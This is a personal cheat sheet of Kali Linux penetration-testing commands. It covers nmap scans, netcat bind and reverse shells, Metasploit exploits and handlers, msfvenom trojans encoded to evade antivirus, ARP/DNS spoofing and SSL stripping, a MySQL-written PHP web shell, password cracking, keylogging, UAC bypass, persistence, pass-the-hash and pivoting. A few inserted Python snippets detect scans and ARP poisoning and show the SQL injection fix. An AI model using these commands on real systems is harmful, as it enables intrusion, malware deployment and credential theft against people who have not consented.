Progmar Marcin Załęczny


Networking commands and penetration testing in Kali Linux

Applications to download:

Nessus - security scanner
Running the application daemon: /etc/init.d/nessusd start
Configuration: https://kali:8834/
On first startup the application displays an interface for creating the user who will log in to the application. Next it displays a form for entering the activation key, which is sent to the e-mail address submitted during registration on the producer's website.
Next the application initialises itself: it downloads the signature database and configures the signatures. This process can take a long time and uses on average 100% of the CPU's time, so be prepared to wait quite a while.
I started the process in the late evening just before going to sleep, and when I woke up in the morning the application was ready for work.

mingw-w64 - provides compilation of 64-bit Windows programs in a Linux environment:
Make sure that the following repositories are available in the /etc/apt/sources.list config file:
# Regular repositories
deb sana main non-free contrib
deb sana/updates main contrib non-free
# Source repositories
deb-src sana main non-free contrib
deb-src sana/updates main contrib non-free
If not, paste them in and install the application with the following commands:
apt-get clean
apt-get update
apt-get upgrade
apt-get install mingw-w64

Tests whether the specified port (5500) is open on the remote machine: nc -v 5500

Tests whether sending a FIN packet to a closed port fails to produce an RST/ACK packet in reply: sudo nmap -sF

Tests whether sending an ACK packet that is not part of an established session produces no reply: sudo nmap -sA

Tests whether the specified UDP port (5500) is open on the remote machine: sudo hping3 -2 -p 5500

Tests whether sending an ICMP echo reply for an echo request the remote machine never sent produces no response: sudo hping3 -1 --icmptype echo-reply

Sends one ICMP echo packet to a remote host: ping -c 1

Sends an ICMP echo packet with no data after its header to a remote host: sudo nmap -sP or: ping -s 0

Broadcast addresses: -

TCP connect scan of the specified machine (root privileges are not required): nmap -P0 -sT or: nmap -sT -n --max-rtt-timeout 500ms

TCP SYN scan of the specified machine: sudo nmap -P0 -sS or (without the option selecting the scan type, because the TCP SYN scan is the default): sudo nmap -n --max-rtt-timeout 500ms

TCP FIN scan of the specified machine: sudo nmap -P0 -sF

TCP XMAS scan of the specified machine: sudo nmap -P0 -sX

TCP NULL scan of the specified machine: sudo nmap -P0 -sN

TCP ACK scan of the specified machine: sudo nmap -P0 -sA

Scans the UDP ports of the specified machine: sudo nmap -P0 -sU or: sudo nmap -sU -n --max-rtt-timeout 500ms

Scans the specified network for an open SSH port: sudo nmap -P0 -p 22 -sS

Detects the version of the service listening on a specified common port (80): sudo nmap -sV -P0 -p 80 -n

TCP SYN scan of the specified machine, using the specified address as the source address and the eth0 interface: sudo nmap -P0 -sS -S -e eth0
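
The scan types above are distinguishable on the receiving side by the TCP flags each probe carries. As an added example (not from the original notes), the following Python code reads constructed firewall log lines modelled on the iptables LOG format, classifies each probe by its flag set and flags sources that look like scanners; the addresses, log lines and the SYN-sweep threshold are made up for the demonstration.

```python
"""Classify TCP probes from firewall log lines and flag likely port scanners.

Constructed sample (not real captures): the lines below follow the field order
of the iptables LOG target (SRC= ... PROTO=TCP SPT= DPT= ... RES=0x00 <FLAGS>
URGP=), with unrelated fields left out.
"""
import re
from collections import defaultdict

SAMPLE_LOG = """\
fw kernel: IN=eth0 SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=40001 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0
fw kernel: IN=eth0 SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=40001 DPT=80 WINDOW=1024 RES=0x00 SYN URGP=0
fw kernel: IN=eth0 SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=40001 DPT=443 WINDOW=1024 RES=0x00 SYN URGP=0
fw kernel: IN=eth0 SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=40001 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0
fw kernel: IN=eth0 SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=40001 DPT=3389 WINDOW=1024 RES=0x00 SYN URGP=0
fw kernel: IN=eth0 SRC=203.0.113.9 DST=192.0.2.10 PROTO=TCP SPT=51000 DPT=22 WINDOW=1024 RES=0x00 FIN URGP=0
fw kernel: IN=eth0 SRC=203.0.113.9 DST=192.0.2.10 PROTO=TCP SPT=51000 DPT=80 WINDOW=1024 RES=0x00 URG PSH FIN URGP=0
fw kernel: IN=eth0 SRC=203.0.113.9 DST=192.0.2.10 PROTO=TCP SPT=51000 DPT=443 WINDOW=1024 RES=0x00 URGP=0
fw kernel: IN=eth0 SRC=203.0.113.9 DST=192.0.2.10 PROTO=TCP SPT=51000 DPT=445 WINDOW=1024 RES=0x00 ACK URGP=0
fw kernel: IN=eth0 SRC=192.0.2.55 DST=192.0.2.10 PROTO=TCP SPT=52344 DPT=443 WINDOW=29200 RES=0x00 SYN URGP=0
"""

LINE_RE = re.compile(
    r"SRC=(?P<src>\S+) .*?PROTO=TCP SPT=\d+ DPT=(?P<dpt>\d+) .*?"
    r"RES=0x[0-9a-fA-F]+ (?P<flags>(?:[A-Z]{3} )*)URGP="
)

# Probe shapes used by the nmap scan types listed above, keyed by TCP flag set.
PROBE_TYPES = {
    frozenset(): "NULL",                       # nmap -sN: no flags at all
    frozenset({"FIN"}): "FIN",                 # nmap -sF
    frozenset({"FIN", "PSH", "URG"}): "XMAS",  # nmap -sX
    frozenset({"ACK"}): "ACK",                 # nmap -sA: ACK with no session
    frozenset({"SYN"}): "SYN",                 # nmap -sS/-sT, or a normal client
}
SYN_SWEEP_PORTS = 4  # distinct ports from one source before SYNs count as a sweep


def classify_flags(flags):
    """Map a set of TCP flag names to a probe type ("OTHER" for ordinary traffic)."""
    return PROBE_TYPES.get(frozenset(flags), "OTHER")


def report(log_text):
    """Summarise probes per source address and decide whether it looks like a scanner."""
    per_src = defaultdict(lambda: {"types": set(), "ports": set()})
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # not a TCP LOG line
        entry = per_src[m.group("src")]
        entry["types"].add(classify_flags(m.group("flags").split()))
        entry["ports"].add(int(m.group("dpt")))
    result = {}
    for src, entry in per_src.items():
        # FIN/XMAS/NULL/ACK probes never open a real session: any of them is a probe.
        stealth = entry["types"] - {"SYN", "OTHER"}
        sweep = "SYN" in entry["types"] and len(entry["ports"]) >= SYN_SWEEP_PORTS
        result[src] = {
            "scan_types": sorted(entry["types"]),
            "distinct_ports": len(entry["ports"]),
            "suspicious": bool(stealth) or sweep,
        }
    return result


if __name__ == "__main__":
    for src, info in report(SAMPLE_LOG).items():
        print(src, info)
```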

Runs netcat as a TCP server listening on port 5001. The program waits for data from the network; after receiving it, it dumps the data to standard output and exits: nc -l 5001

Runs netcat as a UDP server listening on port 5002. The program waits for data from the network; after receiving it, it dumps the data to standard output and exits: nc -u -l 5002

Sends the text given after the echo command to the TCP server listening on port 5001 of the specified remote machine, using the nc (netcat) program: echo "To jest napis 12345" | nc 5001

Sends 10 bytes of 0xa5 to the UDP server listening on port 5002 of the specified remote machine, using the nc (netcat) program: perl -e 'print "\xa5"x10' | nc -u 5002

Restarts the networking service (e.g. after changes made in the /etc/network/interfaces file): service networking restart

Runs the netcat application in server mode listening on port 1234: nc -lvtp 1234

Sends data to the server listening on port 1234 of the (localhost) machine: nc -vt 1234

Runs netcat as a server listening on port 1234. Every incoming line of text is processed by the /bin/sh shell and the result is sent back to the client: nc -lvtp 1234 -e /bin/sh

Runs netcat as a client connecting to the server listening on port 1234 of the local machine and gives the server the ability to execute commands in the client's shell and obtain their results: nc -vt 127.0.0.1 1234 -e /bin/sh

Metasploit in Kali 2

Runs postgresql server service: systemctl start postgresql

Initializes database for metasploit: msfdb init

Runs metasploit console: msfconsole

Searches Metasploit's database for an exploit that takes advantage of the vulnerability with the specified code number (ms08-067): msf> search ms08-067

Displays specified exploit's details: msf> info exploit/windows/smb/ms08_067_netapi

Switches metasploit console context to the specified exploit's module: msf> use windows/smb/ms08_067_netapi

Displays options necessary for running selected module/exploit: msf exploit(ms08_067_netapi)> show options

Sets value of specified option (here RHOST): msf exploit(ms08_067_netapi)> set RHOST

Displays the operating systems that are vulnerable to the selected module/exploit: msf exploit(ms08_067_netapi)> show targets

Sets the target operating system (the number is taken from the list produced by the "show targets" command): msf exploit(ms08_067_netapi)> set target numer

Displays payloads that are compatible with selected module/exploit: msf exploit(ms08_067_netapi)> show payloads

Runs selected exploit: exploit

Exits the meterpreter shell that was started after a successful break-in to the victim system: meterpreter> exit

Selects payload of type reverse shell for the module/exploit: msf exploit(ms08_067_netapi)> set payload windows/shell_reverse_tcp

Exits msfconsole console: msf exploit(ms08_067_netapi)> exit

Program that generates payloads for Metasploit: msfvenom -h

Displays available payloads list: msfvenom -l payloads

Displays options available for selected payload (windows/meterpreter/reverse_tcp): msfvenom -p windows/meterpreter/reverse_tcp --payload-options

Displays available payload formats: msfvenom --help-formats

Generates the payload.exe executable, which starts a meterpreter shell connecting to the specified host on the specified port: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 --platform windows --arch x86 -f exe >payload.exe

Starts the handler for connections coming in from victim systems that executed the payload.exe file generated above: msfconsole
msf> use multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST
msf exploit(handler)> set LPORT 443
msf exploit(handler)> exploit
The last line of the snippet above creates a process listening on port 443.

Uses the auxiliary scanner/smb/pipe_auditor module to list the named pipes available on the SMB server of the remote machine: msf> use scanner/smb/pipe_auditor
msf auxiliary(pipe_auditor)> set RHOSTS
msf auxiliary(pipe_auditor)> exploit

Shell command that updates Metasploit's database of modules/exploits: msfupdate

Displays all scripts (in the /usr/share/nmap/scripts directory) belonging to the 'default' category: nmap --script-help default

Displays details of the specified script (here nfs-ls): nmap --script-help nfs-ls

Scans the specified host for open ports and runs all scripts of the 'default' category against each port found: nmap -sC or (equivalently): nmap --script=default

Scans the specified host for open ports and runs the specified script (nfs-ls) against each port found: nmap --script=nfs-ls

Runs the Metasploit console and checks whether an FTP service is listening on the specified hosts and whether it allows anonymous access: msfconsole
msf> use scanner/ftp/anonymous
msf> set RHOSTS
msf> exploit

Checks whether the specified host is vulnerable to the selected exploit without actually running it: msfconsole
msf> use windows/smb/ms08_067_netapi
msf> set RHOST
msf> check

Checks website on specified host for known vulnerabilities: nikto -h

Attempts to log in to the WebDAV share on the specified host using default credentials: cadaver
Sends the test.txt file to the remote machine: dav:/webdav/> put test.txt

Checks whether the specified user exists on the mail server: nc 25
VRFY username

Turns on IP packet forwarding on the current machine and poisons the ARP cache of the target host so that it associates the spoofed address with this machine: echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t
Now do the same trick the other way round, so that the other host believes the same (from now on this machine forwards packets between the two): arpspoof -i eth0 -t
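
From the defender's side, the two arpspoof commands above leave a recognisable trace: the gateway's IP suddenly resolves to a new MAC, and that same MAC also answers for the victim. As an added example (not from the original notes), the following Python code detects both signs in a constructed sequence of ARP replies; the addresses, MACs and the gateway IP are made up for the demonstration.

```python
"""Detect the two-sided ARP cache poisoning described above from ARP replies.

Constructed example (not from the original notes): the addresses, MACs and the
reply sequence are made up. A real monitor would read replies off the wire
(e.g. from a packet capture) and feed (sender_ip, sender_mac) pairs in here.
"""
from collections import defaultdict

GATEWAY_IP = "192.0.2.1"  # assumed gateway address for the constructed network

# Constructed ARP replies as (sender IP, sender MAC) pairs, in arrival order.
# 192.0.2.1 is the gateway, 192.0.2.20 the victim, de:ad:be:ef:00:99 the spoofer.
SAMPLE_REPLIES = [
    ("192.0.2.1", "00:11:22:33:44:01"),
    ("192.0.2.20", "00:11:22:33:44:20"),
    ("192.0.2.30", "00:11:22:33:44:30"),
    ("192.0.2.1", "de:ad:be:ef:00:99"),   # spoofer claims the gateway's IP
    ("192.0.2.20", "de:ad:be:ef:00:99"),  # ...and the victim's IP (other direction)
    ("192.0.2.1", "de:ad:be:ef:00:99"),   # arpspoof keeps re-sending the claim
]


def analyse_arp(replies):
    """Return (flips, claimants).

    flips: (ip, old_mac, new_mac) every time an IP's MAC binding changes.
    claimants: MACs that answered for more than one IP, with those IPs.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    flips = []
    for ip, mac in replies:
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            flips.append((ip, prev, mac))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
    claimants = {m: sorted(ips) for m, ips in mac_to_ips.items() if len(ips) > 1}
    return flips, claimants


def suspected_mitm(flips, claimants, gateway_ip=GATEWAY_IP):
    """MAC that took over the gateway IP and also answers for another host.

    That pairing is exactly what the two arpspoof commands above produce, so it
    is a stronger signal than a single binding change (which could be a
    replaced router or an address reassigned by DHCP).
    """
    for ip, _old, new in flips:
        if ip == gateway_ip and new in claimants:
            return new
    return None


if __name__ == "__main__":
    flips, claimants = analyse_arp(SAMPLE_REPLIES)
    print("binding changes:", flips)
    print("MACs answering for several IPs:", claimants)
    print("suspected MITM MAC:", suspected_mitm(flips, claimants))
```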

Translates the specified domain name to an IP address: nslookup

Poisons DNS with the dnsspoof command, using the entries from hosts.txt: cat hosts.txt
dnsspoof -i eth1 -f hosts.txt

Captures all network traffic between the gateway and the host: ettercap -Ti eth0 -M arp:remote / /

Carrying out an SSL stripping attack:

  1. Run ARP spoofing between the victim host and the default gateway
  2. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
  3. Issue the sslstrip command: sslstrip -l 8080

Generates a PHP script that opens a meterpreter shell when a web page containing it is visited. The script opens no extra window and connects to the specified host on the specified port number (2323): msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=2323 -f raw >meterpreter.php
Runs the listening process that catches connections from the script described above: msfconsole
msf> use multi/handler
msf> set payload php/meterpreter/reverse_tcp
msf> set LHOST
msf> set LPORT 2323
msf> exploit
Once the connection is made we can query the current user name: meterpreter> getuid
We can also dump the password hashes of the victim Windows system: meterpreter> hashdump

Makes MySQL write an arbitrary script onto the victim machine: SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\shell.php"

Searches Metasploit's module/exploit database for the specified system: msf> search drupal

Obtains information about the specified module/exploit: msf> info unix/webapp/php_xmlrpc_eval

Crawls the specified website and all linked pages up to 1 level deep for words at least 5 characters long and saves them to the passwords.txt file: cewl -w passwords.txt -d 1 -m 5

Generates a dictionary of 7- and 8-character passwords in which each entry consists of the letters A and B: crunch 7 8 AB

Guesses user names and their passwords on the specified POP3 server: hydra -L userlist.txt -P passwords.txt pop3

Guesses the password of user mzaleczny on the specified POP3 server: hydra -l mzaleczny -P passwords.txt pop3

On Windows, the c:\windows\repair directory contains the following files:
sam - contains encrypted user names and the hashes of their passwords
system - contains the system key used to encrypt the data in the file above.
The live/production versions of these files sit in the c:\windows\system32\config directory. To extract the user names and their password hashes run the following commands: bkhive system xpkey.txt
samdump2 sam xpkey.txt
Save the output of the commands above (or the output of the "meterpreter> hashdump" command described above) to a file named "ntpasswords.txt" and issue the following command to guess the passwords: john ntpasswords.txt

John can also be used to guess Linux users' passwords: john linux_passwords.txt --wordlist=dictionary.txt

The Metasploit AllPorts payload connects back on the first port number that is not filtered by the firewall; to find it, every port is tried starting from 1: msf exploit(ms08_067_netapi)> set payload windows/shell/reverse_tcp_allports
msf exploit(ms08_067_netapi)> show options
msf exploit(ms08_067_netapi)> exploit

The Aurora exploit uses an IE vulnerability to connect to a remote system and gain access to its shell: msf> use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora)> show options
msf exploit(ms10_002_aurora)> set SRVHOST
msf exploit(ms10_002_aurora)> set SRVPORT 80
msf exploit(ms10_002_aurora)> set URIPATH aurora
msf exploit(ms10_002_aurora)> set payload windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora)> set LHOST
msf exploit(ms10_002_aurora)> exploit
Now, when the victim visits the address in Internet Explorer, the exploit fires and the attacker owning the host gains access to the victim's OS shell.

Connects to the specified session: msf exploit(ms10_002_aurora)> sessions -i SESSION_ID

Displays the jobs running in the background of Metasploit's console: msf exploit(ms10_002_aurora)> jobs

Kills the job with the specified ID in Metasploit's console: msf exploit(ms10_002_aurora)> kill JOB_ID

Displays the advanced parameters of the selected module/exploit: msf exploit(ms10_002_aurora)> show advanced

Makes the migrate.rb script (with the -f parameter) run automatically after a successful connection from the victim host. It moves the Meterpreter shell into a newly started notepad process on the host, so that the connection is not lost when the hung IE is closed: msf exploit(ms10_002_aurora)> set AutoRunScript migrate -f
msf exploit(ms10_002_aurora)> exploit
Alternatively, we can set the advanced parameter "PrependMigrate" to true. It migrates the shell into a newly created process even before the exploit fires.

Prepares a malicious PDF and listens for callback connections: msf> use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf)> show options
msf exploit(adobe_utilprintf)> exploit
msf exploit(adobe_utilprintf)> cp /root/.msf4/local/msf.pdf /var/www
msf exploit(adobe_utilprintf)> systemctl start apache2
Catching connections from victim hosts: msf exploit(adobe_utilprintf)> use multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST
msf exploit(handler)> set ExitOnSession false
We run the handler as a background job: msf exploit(handler)> exploit -j

Exploit for web browser with Java < 7 Update 11: msf> use exploit/multi/browser/java_jre17_jmxbean
msf exploit(java_jre17_jmxbean)> set SRVHOST
msf exploit(java_jre17_jmxbean)> set SRVPORT 80
msf exploit(java_jre17_jmxbean)> set URIPATH javaexploit
msf exploit(java_jre17_jmxbean)> set payload java/meterpreter/reverse_http
msf exploit(java_jre17_jmxbean)> set LHOST
msf exploit(java_jre17_jmxbean)> exploit

Applet exploit for web browser with Java: msf> use exploit/multi/browser/java_signed_applet
msf exploit(java_signed_applet)> set APPLETNAME CustomAppletName
msf exploit(java_signed_applet)> set SRVHOST
msf exploit(java_signed_applet)> set SRVPORT 80
msf exploit(java_signed_applet)> set URIPATH javaappletexploit
msf exploit(java_signed_applet)> set target 0
msf exploit(java_signed_applet)> set payload java/meterpreter/reverse_tcp
msf exploit(java_signed_applet)> set LHOST
msf exploit(java_signed_applet)> exploit

Module that recognises the web browser and applies every available exploit that might succeed: msf> use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn)> set LHOST
msf auxiliary(browser_autopwn)> set URIPATH autopwn
msf auxiliary(browser_autopwn)> exploit
Displays all sessions with an active shell running on victim computers: msf auxiliary(browser_autopwn)> sessions -l

Program for carrying out social engineering attacks (sending malicious code in e-mail attachments, creating phishing web pages, etc.; it is installed in Kali Linux by default): setoolkit

In Kali Linux the /usr/share/windows-binaries directory stores a few executables that can be used to carry malicious payloads (any other Windows exe binary can be used as well). Here is how to prepare a trojan: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -x /usr/share/windows-binaries/radmin.exe -k -f exe > radmin.exe
The process listening for incoming connections from meterpreter shells is started in the Metasploit console using the handler module: msfconsole
msf> use multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST
msf exploit(handler)> set LPORT 4444
msf exploit(handler)> exploit

Works as the command above but also runs 10 iterations of payload encoding with the x86/shikata_ga_nai encoder: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -x /usr/share/windows-binaries/radmin.exe -e x86/shikata_ga_nai -i 10 -k -f exe >radmin_coded.exe

Displays the list of encoders supported by the msfvenom program: msfvenom -l encoders

Encodes a payload several times with different encoders: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -i 10 -f raw >radmin_coded.bin
msfvenom -p - -x /usr/share/windows-binaries/radmin.exe -k -f exe -a x86 --platform windows -e x86/bloxor -i 2 >radmin_coded2.exe <radmin_coded.bin

Generates the payload as a C-language string: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f c >radmin.c

Generates a random text string of length 512: cat /dev/urandom | tr -dc 'A-Za-z0-9' | head -c512

Encrypts the input.exe executable with the hyperion.exe program and saves it as the output.exe executable: wine hyperion.exe input.exe output.exe

Installs and runs a TFTP server in Kali Linux: apt-get install atftpd
systemctl start atftpd
Downloads the plik.txt file from the remote server to a Windows machine running the cmd shell: tftp -i GET plik.txt
Downloading a file from the Windows machine using the cmd shell:
Uploads the plik.txt file from a Windows machine running the cmd shell to the remote server: tftp -i PUT plik.txt

Meterpreter scripts reside in the /usr/share/metasploit-framework/scripts/meterpreter directory. To run a script issue the following command: meterpreter> run script-name
A script's help can be obtained as below: meterpreter> run script-name -h

Displays the list of running processes: meterpreter> ps

Moves a meterpreter session into a process with id 1234: meterpreter> run migrate -p 1234

Moves a meterpreter session to run as a background job: meterpreter> background

Obtains the list of logged-on users of the system in the specified session: msf> use post/windows/gather/enum_logged_on_users
msf post(enum_logged_on_users)> set SESSION 1
msf post(enum_logged_on_users)> exploit

Calling any WinAPI function, for example to check whether the current user is an admin: msf> sessions -i 1
meterpreter> irb
>> client.railgun.shell32.IsUserAdmin
>> exit

Runs a series of exploits until it obtains a user with SYSTEM privileges or runs out of exploits: meterpreter> getsystem
meterpreter> getuid

Reverts to the previous user's privileges: meterpreter> rev2self

Runs an exploit for Windows XP SP2/SP3 to elevate the user's privileges: msf> use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf)> set SESSION 1
msf exploit(ms11_080_afdjoinleaf)> set payload windows/meterpreter/reverse_tcp
msf exploit(ms11_080_afdjoinleaf)> set LHOST
msf exploit(ms11_080_afdjoinleaf)> exploit

Bypasses UAC (User Account Control) in Windows 7: msf> use exploit/windows/local/bypassuac
msf exploit(bypassuac)> set SESSION 1
msf exploit(bypassuac)> exploit
meterpreter> getuid
The commands above open a meterpreter session with UAC bypassed, so the command below should work properly: meterpreter> getsystem

Enters a Linux shell within the meterpreter session (of course, the compromised machine must be running Linux): meterpreter> shell
And issues some basic commands: > whoami
> uname -a
> lsb_release -a
> udevadm --version

Searches the local exploit database for the udev program: /usr/share/exploitdb/searchsploit udev

Runs nc as a server listening on port 12345: nc -lvp 12345
Connects to the netcat server started above and attaches a shell as the program handling its standard input: nc 12345 -e /bin/bash
From now on, within the first of the two commands above you can issue Linux shell commands that will be executed remotely.

Searches, from within a meterpreter session, for files whose names contain the phrase "password": meterpreter> search -f password

Starts the key-logger built into meterpreter: meterpreter> keyscan_start
Displays the captured keypresses: meterpreter> keyscan_dump
Stops the key-logger: meterpreter> keyscan_stop

Retrieves passwords stored by the WinSCP application on a Windows system: msf> use post/windows/gather/credentials/winscp
msf post(winscp)> set session 1
msf post(winscp)> exploit

Displays the list of users on a Windows system: cmd c:\> net users

Displays the list of local admins on a Windows system: cmd c:\> net localgroup Administrators

After compromising one Windows host you can try to compromise other hosts in the domain using the psexec exploit: msf> use exploit/windows/smb/psexec
msf exploit(psexec)> set RHOST
msf exploit(psexec)> set SMBUser username
msf exploit(psexec)> set SMBPass userpassword
msf exploit(psexec)> set SMBDomain GRUPA_ROBOCZA
msf exploit(psexec)> exploit

Uses the psexec module/exploit to log in to a remote host knowing only the hash of the real password: msf exploit(psexec)> set SMBPass password_LM_or_NTLM_hash
msf exploit(psexec)> exploit

Runs the sshexec module/exploit to log in to a remote Linux host: msf> use exploit/multi/ssh/sshexec
msf exploit(sshexec)> set RHOST
msf exploit(sshexec)> set USERNAME user_name
msf exploit(sshexec)> set PASSWORD my_password
msf exploit(sshexec)> set payload linux/x86/meterpreter/reverse_tcp
msf exploit(sshexec)> set LHOST
msf exploit(sshexec)> exploit
meterpreter> getuid
meterpreter> shell
> whoami

Loads the incognito module to handle tokens on a Windows system: msf> load incognito
Lists the available tokens in the meterpreter shell: meterpreter> list_tokens -u
Obtains the specified user's privileges (associated with the given 'COMPXP\\username' token): meterpreter> impersonate_token COMPXP\\username

Starts an SMB server in a Windows domain environment that listens on port 445 and saves user password hashes to the /root/johnpwfile file: msf> use auxiliary/server/capture/smb
msf auxiliary(smb)> set JOHNPWFILE /root/johnpwfile
msf auxiliary(smb)> exploit
Next you can initiate SMB connections to the fake host from within the compromised machine: meterpreter> shell
C:\windows\system32> net use \\\anything

Displays the network configuration of the host running the meterpreter shell: meterpreter> ifconfig

Routes all traffic for the network through session number 2 (which has a connection to a compromised router in the same network); this is the so-called pivot: msf> route add 2

Scans ports from within the Metasploit shell: msf> use scanner/portscan/tcp
msf auxiliary(tcp)> set RHOST
msf auxiliary(tcp)> exploit

Runs a socks4a proxy server in Metasploit: msf> use auxiliary/server/socks4a
msf auxiliary(socks4a)> set SRVPORT 4040
msf auxiliary(socks4a)> exploit
Now in the /etc/proxychains.conf file change the line: socks4 9050 to: socks4 4040
From now on you can run programs outside Metasploit through the pivot network by using the proxychains application, e.g.: root@kali:~# proxychains nmap -Pn -sT -sV -p 21,22,25,80,445

Creates a new user (martin) and assigns it to the domain in a domain environment: C:\> net user martin mypassword /add /domain
Assigns the user created above to the Administrators group: C:\> net localgroup Administrators martin /add

Creates on the compromised Windows system a VisualBasic script that is executed after every system start and tries to connect to the attacker's host every 10 minutes: meterpreter> run persistence -r -p 12345 -X -i 600

Runs the burpsuite application: Applications -> Web Applications Analysis -> burpsuite
Proxy server configuration in Firefox: Menu Edit -> Preferences -> Advanced. There switch to the "Network" tab and click the "Settings" button; the proxy server configuration window opens.

Example of injecting arbitrary code through variables processed by web applications: ' OR '1'='1&password=' OR '1'='1 or 1 in (show databases)
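
As an added example (not from the original notes), the following Python code shows why the ' OR '1'='1 string above bypasses a login check built by string concatenation, and that the same input fails against a parameterised query; the in-memory SQLite table and the account in it are constructed for the demonstration.

```python
"""The ' OR '1'='1 injection from the notes above against a string-built login
query, beside the parameterised form that defeats it.

Constructed example (not code from the original notes): an in-memory SQLite
database with a single user stands in for the web application's database.
"""
import sqlite3

INJECTION = "' OR '1'='1"   # the value submitted in both form fields above


def make_db():
    """Constructed users table with one account (plaintext only to keep the demo short)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    return conn


def login_vulnerable(conn, user, password):
    """Builds the WHERE clause by concatenation: input quotes become SQL syntax."""
    sql = ("SELECT name FROM users WHERE name = '" + user +
           "' AND password = '" + password + "'")
    # With INJECTION in both fields the query becomes
    #   ... WHERE name = '' OR '1'='1' AND password = '' OR '1'='1'
    # and the trailing OR '1'='1' makes the condition true for every row.
    return conn.execute(sql).fetchone() is not None


def login_parameterised(conn, user, password):
    """Binds the inputs as data: the driver never lets them alter the statement."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (user, password)).fetchone() is not None


def demo():
    """Return the four outcomes so the difference can be checked, not just printed."""
    conn = make_db()
    return {
        "vulnerable_injected": login_vulnerable(conn, INJECTION, INJECTION),
        "vulnerable_valid": login_vulnerable(conn, "admin", "S3cret!"),
        "parameterised_injected": login_parameterised(conn, INJECTION, INJECTION),
        "parameterised_valid": login_parameterised(conn, "admin", "S3cret!"),
    }


if __name__ == "__main__":
    for case, logged_in in demo().items():
        print(f"{case}: {'logged in' if logged_in else 'rejected'}")
```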

Automated extraction of information about a database: sqlmap -u "" --dump

Attempts to obtain access to a shell on the host where SQL Server is running: sqlmap -u "" --os-shell
The method uses the SQL Server xp_cmdshell command.

All Metasploit's exploits reside in following directory: /usr/share/metasploit-framework/modules/exploits